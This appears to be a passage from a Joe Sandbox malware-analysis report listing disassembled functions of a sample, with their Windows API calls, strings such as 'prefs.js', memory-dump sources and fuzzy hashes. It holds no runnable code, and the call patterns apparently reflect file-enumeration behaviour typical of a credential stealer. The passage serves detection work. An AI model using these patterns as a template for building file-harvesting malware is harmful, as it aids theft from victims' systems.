%s\*, xrefs: 004133D0
%s\%s, xrefs: 0041357F
%s\%s, xrefs: 0041348A
18A, xrefs: 00413792, 00413755, 00413679, 00413419, 0041367C, 00413758

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: Find$File$CloseFirstNextlstrcatwsprintf
String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*$18A
API String ID: 1125553467-3461493422
Opcode ID: 2c2127b493feb9c0923622a76342aa2a5b36bb1f3b951eba277b826fa9ed8927
Instruction ID: eff374fbcd62c6e18ab1f1aaab25817c9043c0eeef42efb3c17498ac9b2729e3
Opcode Fuzzy Hash: 2c2127b493feb9c0923622a76342aa2a5b36bb1f3b951eba277b826fa9ed8927
Instruction Fuzzy Hash: 93A18FB1A00218ABCB34DFA4DC85FEE7379BF48305F448589E50D96181EB789B89CF65

Function 004143F0 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0041440C
FindFirstFileA.KERNEL32(?,?), ref: 00414423
StrCmpCA.SHLWAPI(?,00420FAC), ref: 00414451
StrCmpCA.SHLWAPI(?,00420FB0), ref: 00414467
FindNextFileA.KERNEL32(000000FF,?), ref: 0041465D
FindClose.KERNEL32(000000FF), ref: 00414672

Strings

%s\%s, xrefs: 00414484
%s\*, xrefs: 00414400
%s\%s, xrefs: 004144DB

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*
API String ID: 180737720-445461498
Opcode ID: 98a81ed192664bcdaa0b32f6b0e27bf4c19a120a060cdc404504deab6b035169
Instruction ID: 93dd7dc702b7a0e0fded8c7806ce8f3795ba14a1618ae0d79b753d530a2b99d1
Opcode Fuzzy Hash: 98a81ed192664bcdaa0b32f6b0e27bf4c19a120a060cdc404504deab6b035169
Instruction Fuzzy Hash: 11616571900618ABCB30EFA0DC49FEE737DBF48704F408599F50996151EB78AB858FA5

Function 007F3627 Relevance: 30.2, APIs: 20, Instructions: 250filestringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 007F3643
FindFirstFileA.KERNEL32(?,?), ref: 007F365A
lstrcat.KERNEL32(?,?), ref: 007F36AC
StrCmpCA.SHLWAPI(?,00420F40), ref: 007F36BE
StrCmpCA.SHLWAPI(?,00420F44), ref: 007F36D4
FindNextFileA.KERNEL32(000000FF,?), ref: 007F39DE
FindClose.KERNEL32(000000FF), ref: 007F39F3

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextlstrcatwsprintf
String ID:
API String ID: 1125553467-0
Opcode ID: 69369503905fca99af148202eb14947989a0f115e22ed9b02763016e10f78687
Instruction ID: 5437e0becb56b7585f2453472c31df46df2c15c84dc3bb3d812b42ea8e748d1e
Opcode Fuzzy Hash: 69369503905fca99af148202eb14947989a0f115e22ed9b02763016e10f78687
Instruction Fuzzy Hash: 17A150B1A0021CABDB34DF64DC89FFE7779AF48300F444589A60D96241DBB5AB85CF62

Function 00414050 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414060
HeapAlloc.KERNEL32(00000000), ref: 00414067
wsprintfA.USER32 ref: 00414086
FindFirstFileA.KERNEL32(?,?), ref: 0041409D
StrCmpCA.SHLWAPI(?,00420F94), ref: 004140CB
StrCmpCA.SHLWAPI(?,00420F98), ref: 004140E1
FindNextFileA.KERNEL32(000000FF,?), ref: 0041416B
FindClose.KERNEL32(000000FF), ref: 00414180
lstrcat.KERNEL32(?,0084D670), ref: 004141A5
lstrcat.KERNEL32(?,0087BA88), ref: 004141B8
lstrlenA.KERNEL32(?), ref: 004141C5
lstrlenA.KERNEL32(?), ref: 004141D6

Strings

%s\*, xrefs: 0041407A
%s\%s, xrefs: 004140FB

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
String ID: %s\%s$%s\*
API String ID: 13328894-2848263008
Opcode ID: 2e2f05fc5d5be89d1787a0f3d0fd8ced363104fbef2b5c670a72c028b26947b7
Instruction ID: 5a9d9924cf4f5588b7cf1b0220733e19b9eaeea9c8f58638c5d055d4a934acf6
Opcode Fuzzy Hash: 2e2f05fc5d5be89d1787a0f3d0fd8ced363104fbef2b5c670a72c028b26947b7
Instruction Fuzzy Hash: 6A5194B1940218ABC720EB70DC89FEE777DAF58304F40458DB60996190EB749BC5CFA5

Function 007F4657 Relevance: 27.2, APIs: 18, Instructions: 172fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 007F4673
FindFirstFileA.KERNEL32(?,?), ref: 007F468A
StrCmpCA.SHLWAPI(?,00420FAC), ref: 007F46B8
StrCmpCA.SHLWAPI(?,00420FB0), ref: 007F46CE
FindNextFileA.KERNEL32(000000FF,?), ref: 007F48C4
FindClose.KERNEL32(000000FF), ref: 007F48D9

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID:
API String ID: 180737720-0
Opcode ID: 8b60687f792d609a2f25e0f2de81758ef4f771a45333d7305f3ac5e0680fe150
Instruction ID: 62d65f8d8fabb6be413e2a795854b15bc74f133a7227bc5eb70512722e102c6d
Opcode Fuzzy Hash: 8b60687f792d609a2f25e0f2de81758ef4f771a45333d7305f3ac5e0680fe150
Instruction Fuzzy Hash: 47616772900618ABCB30EFA0DD49FEE777DBF49700F408588B60996151EB74AB85CFA5

Function 004139B0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 004139D3
FindFirstFileA.KERNEL32(?,?), ref: 004139EA
StrCmpCA.SHLWAPI(?,00420F7C), ref: 00413A18
StrCmpCA.SHLWAPI(?,00420F80), ref: 00413A2E
FindNextFileA.KERNEL32(000000FF,?), ref: 00413B7C
FindClose.KERNEL32(000000FF), ref: 00413B91

Strings

%s\%s, xrefs: 004139C7

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s
API String ID: 180737720-4073750446
Opcode ID: 315ebf0ebacb4e7257645ed8829ab9970df06b227fce9f74be2bd60dbc84d413
Instruction ID: 0978cf4b12305aed0c6265f700eadee139911ff0226e3ee7039eca2cb0139609
Opcode Fuzzy Hash: 315ebf0ebacb4e7257645ed8829ab9970df06b227fce9f74be2bd60dbc84d413
Instruction Fuzzy Hash: EE5188B1900218ABCB24EF60DC45EEE777DBF44304F40858DB60996151EB749BC5CF98

Function 007F42B7 Relevance: 22.6, APIs: 15, Instructions: 137stringmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 007F42C7
RtlAllocateHeap.NTDLL(00000000), ref: 007F42CE
wsprintfA.USER32 ref: 007F42ED
FindFirstFileA.KERNEL32(?,?), ref: 007F4304
StrCmpCA.SHLWAPI(?,00420F94), ref: 007F4332
StrCmpCA.SHLWAPI(?,00420F98), ref: 007F4348
FindNextFileA.KERNEL32(000000FF,?), ref: 007F43D2
FindClose.KERNEL32(000000FF), ref: 007F43E7
lstrcat.KERNEL32(?,0062CD24), ref: 007F440C
lstrcat.KERNEL32(?,0062CA2C), ref: 007F441F
lstrlen.KERNEL32(?), ref: 007F442C
lstrlen.KERNEL32(?), ref: 007F443D

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
String ID:
API String ID: 671575355-0
Opcode ID: 9e0ede8920beea54048d7fb743c8b5954d1dedf7a5b1cb7f672e540066e0bd70
Instruction ID: 3ee4f0ac4fe8da9d41b83ee27f3292bb9f70fac0ce242859de527f93a0fc6f1a
Opcode Fuzzy Hash: 9e0ede8920beea54048d7fb743c8b5954d1dedf7a5b1cb7f672e540066e0bd70
Instruction Fuzzy Hash: B85152B194061CABCB24EB70DC89FFE777DAF58700F404588B64992191DB789B89CFA1

Function 007F3C17 Relevance: 18.1, APIs: 12, Instructions: 133fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 007F3C3A
FindFirstFileA.KERNEL32(?,?), ref: 007F3C51
StrCmpCA.SHLWAPI(?,00420F7C), ref: 007F3C7F
StrCmpCA.SHLWAPI(?,00420F80), ref: 007F3C95
FindNextFileA.KERNEL32(000000FF,?), ref: 007F3DE3
FindClose.KERNEL32(000000FF), ref: 007F3DF8

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID:
API String ID: 180737720-0
Opcode ID: 57298016655c2d216e50c6725fcc0369fb37f6bc677662b0497216ab4019472d
Instruction ID: 26c6151926d894e9dbb61ea1d009838020061700472750a3321603fcdae9151c
Opcode Fuzzy Hash: 57298016655c2d216e50c6725fcc0369fb37f6bc677662b0497216ab4019472d
Instruction Fuzzy Hash: 9F5164B1900218EBCB24EB60DC89EFE777DBF48700F408588B74992191DB759B85CFA5

Function 0040EB60 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0040EB7E
FindFirstFileA.KERNEL32(?,?), ref: 0040EB95
StrCmpCA.SHLWAPI(?,004214DC), ref: 0040EBEB
StrCmpCA.SHLWAPI(?,004214E0), ref: 0040EC01
FindNextFileA.KERNEL32(000000FF,?), ref: 0040F0EE
FindClose.KERNEL32(000000FF), ref: 0040F103

Strings

%s\*.*, xrefs: 0040EB72

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\*.*
API String ID: 180737720-1013718255
Opcode ID: 245ffbccf7225f9048c0cc9cdf40109bfff7d991bbb537b98e5ab5ee6f991382
Instruction ID: c6306bd3c9db837ca22bf811b4dc293e3d61997c094f6f04bf3b71cb7d88404f
Opcode Fuzzy Hash: 245ffbccf7225f9048c0cc9cdf40109bfff7d991bbb537b98e5ab5ee6f991382
Instruction Fuzzy Hash: 27E13071912118AADB14FB61DC56EEE7338AF50314F4041EEB40B62092EE786FD9CF5A

Function 0040DC50 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 370fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00420C19), ref: 0040DC9E
StrCmpCA.SHLWAPI(?,0042146C), ref: 0040DCEE
StrCmpCA.SHLWAPI(?,00421470), ref: 0040DD04
FindNextFileA.KERNEL32(000000FF,?), ref: 0040E220
FindClose.KERNEL32(000000FF), ref: 0040E232

Strings

t@, xrefs: 0040DC72, 0040E240, 0040DD33, 0040DCB5, 0040DD36
\*.*, xrefs: 0040DC66

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
String ID: \*.*$t@
API String ID: 2325840235-663382066
Opcode ID: acc64c80acd4c0781bb2eac21ba90ba2914f01352b1911b6e2855633906eada0
Instruction ID: e9223715fb7ea1854cb62e564a6307543a1272858c9b536fbbbe29962c1fc9f0
Opcode Fuzzy Hash: acc64c80acd4c0781bb2eac21ba90ba2914f01352b1911b6e2855633906eada0
Instruction Fuzzy Hash: 3EF1FE71915118AACB15FB61DC95AEEB338AF24314F8041DFB40A62091EF782BD9CF5A

Function 0040F4F0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042155C,00420D7E), ref: 0040F55E
StrCmpCA.SHLWAPI(?,00421560), ref: 0040F5AF
StrCmpCA.SHLWAPI(?,00421564), ref: 0040F5C5
FindNextFileA.KERNEL32(000000FF,?), ref: 0040F8F1
FindClose.KERNEL32(000000FF), ref: 0040F903

Strings

prefs.js, xrefs: 0040F652

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: prefs.js
API String ID: 3334442632-3783873740
Opcode ID: 976b20c353f91693b7b5bbe81795deec936d66f5c958c5e1230e63120413e9fe
Instruction ID: 51e7ee45db09aa5f39b002a0c415dffe3bc9b22f3a493195af03bb486277efdd
Opcode Fuzzy Hash: 976b20c353f91693b7b5bbe81795deec936d66f5c958c5e1230e63120413e9fe
Instruction Fuzzy Hash: 00B17571901108ABCB24FF61DC56FEE7379AF54314F0081BEA40A57191EF386B99CB9A

Function 00401710 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042500C,?,00401F6C,?,004250B4,?,?,00000000,?,00000000), ref: 00401963
StrCmpCA.SHLWAPI(?,0042515C), ref: 004019B3
StrCmpCA.SHLWAPI(?,00425204), ref: 004019C9
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D80
DeleteFileA.KERNEL32(00000000), ref: 00401E0A
FindNextFileA.KERNEL32(000000FF,?), ref: 00401E60
FindClose.KERNEL32(000000FF), ref: 00401E72

Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

Strings

\*.*, xrefs: 00401831

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 1415058207-1173974218
Opcode ID: 2b6bbc65f66c3142ad7c13d60195210823224091eca271029ad678d332a4e75a
Instruction ID: 7f74e4117e18f221836cc8dfa6e9da0cbfb987b90413c5c57b10598df2daaecd
Opcode Fuzzy Hash: 2b6bbc65f66c3142ad7c13d60195210823224091eca271029ad678d332a4e75a
Instruction Fuzzy Hash: C2123F71911118ABCB15FB61CC96EEE7338AF54314F4041AEB50B62091EF786BD8CF9A

Function 007EEDC7 Relevance: 13.9, APIs: 9, Instructions: 369fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 007EEDE5
FindFirstFileA.KERNEL32(?,?), ref: 007EEDFC
StrCmpCA.SHLWAPI(?,004214DC), ref: 007EEE52
StrCmpCA.SHLWAPI(?,004214E0), ref: 007EEE68
FindNextFileA.KERNEL32(000000FF,?), ref: 007EF355
FindClose.KERNEL32(000000FF), ref: 007EF36A

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID:
API String ID: 180737720-0
Opcode ID: 8a75e45534c22e4b832c3122d997de1971d342c8b6ba5825363fb23f09715591
Instruction ID: 332e801e76050304c6766fead18f3b3ada1633727340590ba7afc7895aa16d24
Opcode Fuzzy Hash: 8a75e45534c22e4b832c3122d997de1971d342c8b6ba5825363fb23f09715591
Instruction Fuzzy Hash: 3BE162B190125CEADB54FB64CC9AEFE7338AF54300F404199B20E62152EF786B89DF52

Function 007EDB27 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 007FA377: lstrcpy.KERNEL32(00420DFF,00000000), ref: 007FA3BF

Part of subcall function 007FA557: lstrcpy.KERNEL32(00000000,?), ref: 007FA5A9
Part of subcall function 007FA557: lstrcat.KERNEL32(00000000), ref: 007FA5B9

Part of subcall function 007FA5E7: lstrlen.KERNEL32(?,0062C9F0,?,00424EAC,00420DFF), ref: 007FA5FC
Part of subcall function 007FA5E7: lstrcpy.KERNEL32(00000000), ref: 007FA63B
Part of subcall function 007FA5E7: lstrcat.KERNEL32(00000000,00000000), ref: 007FA649

Part of subcall function 007FA4D7: lstrcpy.KERNEL32(?,00420DFF), ref: 007FA53C

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00421454,00420B96), ref: 007EDB92
StrCmpCA.SHLWAPI(?,00421458), ref: 007EDBDA
StrCmpCA.SHLWAPI(?,0042145C), ref: 007EDBF0
FindNextFileA.KERNEL32(000000FF,?), ref: 007EDE73
FindClose.KERNEL32(000000FF), ref: 007EDE85

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: 958f2ffed477e1825fabd41d763f9be92bff8401c36221e8c403e20e7d3f70e7
Instruction ID: 39ca96e7d69598b9c9bd52fc49ee2dea381b76ad8715256dc59c34c668506bb7
Opcode Fuzzy Hash: 958f2ffed477e1825fabd41d763f9be92bff8401c36221e8c403e20e7d3f70e7
Instruction Fuzzy Hash: 6A9153B290024CE7CB14FBB4DC5EDFD7339AF99300F404568B64A56241EE7CAB189B92

Function 0040D8C0 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00421454,00420B96), ref: 0040D92B
StrCmpCA.SHLWAPI(?,00421458), ref: 0040D973
StrCmpCA.SHLWAPI(?,0042145C), ref: 0040D989
FindNextFileA.KERNEL32(000000FF,?), ref: 0040DC0C
FindClose.KERNEL32(000000FF), ref: 0040DC1E

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: d8fbe8c2d5d6a3432a59ebf31e40a48ac58d395b4255c7f30e1d9a9003a5fca7
Instruction ID: be130f63dcff9d07870f4f5a4cae658f80ac6a3b159c82c28f33fed987b29411
Opcode Fuzzy Hash: d8fbe8c2d5d6a3432a59ebf31e40a48ac58d395b4255c7f30e1d9a9003a5fca7
Instruction Fuzzy Hash: 23914672900204A7CB14FBB1DC56DED737DAF94354F00866EF80A66191EE389B5C8B9B

Function 007EF757 Relevance: 12.3, APIs: 8, Instructions: 275fileCOMMON

Download Yara Rule

APIs

Part of subcall function 007FA377: lstrcpy.KERNEL32(00420DFF,00000000), ref: 007FA3BF

Part of subcall function 007FA557: lstrcpy.KERNEL32(00000000,?), ref: 007FA5A9
Part of subcall function 007FA557: lstrcat.KERNEL32(00000000), ref: 007FA5B9

Part of subcall function 007FA5E7: lstrlen.KERNEL32(?,0062C9F0,?,00424EAC,00420DFF), ref: 007FA5FC
Part of subcall function 007FA5E7: lstrcpy.KERNEL32(00000000), ref: 007FA63B
Part of subcall function 007FA5E7: lstrcat.KERNEL32(00000000,00000000), ref: 007FA649

Part of subcall function 007FA4D7: lstrcpy.KERNEL32(?,00420DFF), ref: 007FA53C

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042155C,00420D7E), ref: 007EF7C5
StrCmpCA.SHLWAPI(?,00421560), ref: 007EF816
StrCmpCA.SHLWAPI(?,00421564), ref: 007EF82C
FindNextFileA.KERNEL32(000000FF,?), ref: 007EFB58
FindClose.KERNEL32(000000FF), ref: 007EFB6A

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: c2cf0b26efe003fe9c8186da4a6b1b014191193d639056edf1129012b20a3b9c
Instruction ID: dad7ac3433c6922d651a65a5f240b7d82396dad0fce802fcccfdd75c1b137e1f
Opcode Fuzzy Hash: c2cf0b26efe003fe9c8186da4a6b1b014191193d639056edf1129012b20a3b9c
Instruction Fuzzy Hash: C3B1727190025CEBCB24FB64DC9AEFD7375AF54300F4081A8E64E56251EF78AB48DB92

Function 007E1977 Relevance: 11.0, APIs: 7, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 007FA377: lstrcpy.KERNEL32(00420DFF,00000000), ref: 007FA3BF

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042500C,?,?,?,004250B4,?,?,00000000,?,00000000), ref: 007E1BCA
StrCmpCA.SHLWAPI(?,0042515C), ref: 007E1C1A
StrCmpCA.SHLWAPI(?,00425204), ref: 007E1C30
